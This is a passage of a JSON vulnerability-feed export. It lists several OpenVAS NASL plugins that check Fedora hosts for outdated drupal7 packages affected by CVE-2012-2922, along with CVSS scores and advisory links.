"http://plugins.openvas.org/nasl.php?oid=864276", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8360\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 15\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081662.html\");\n script_id(864276);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:44 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-8360\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8360\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-22T13:09:39", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:865260", "href": "http://plugins.openvas.org/nasl.php?oid=865260", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1076\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097647.html\");\n script_id(865260);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:35 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2013-1076\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1076\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:06:23", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:864824", "href": "http://plugins.openvas.org/nasl.php?oid=864824", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090859.html\");\n script_id(864824);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:22 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-16421\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16421\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:07:38", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8398", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:864328", "href": "http://plugins.openvas.org/nasl.php?oid=864328", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8398\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081721.html\");\n script_id(864328);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:03:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-8398\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8398\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:37:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-2872", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865431", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865431", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-2872\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/099673.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865431\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:16:43 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2013-2872\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-2872\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.20~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-0c1d62bf5b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876313", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876313\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:44:00 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-0c1d62bf5b\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-0c1d62bf5b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLDL4RPEK6NZBNPCXUVPH5DPWLROWFJ6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-0c1d62bf5b advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.64~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865260", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1076\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097647.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865260\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:35 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2013-1076\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1076\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8360", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864276", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864276", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8360\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081662.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864276\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:44 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-8360\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8360\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8362", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8362\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081661.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864275\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:41 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-8362\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8362\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc16\", rls:\"FC16\")) != NULL)\n {\n 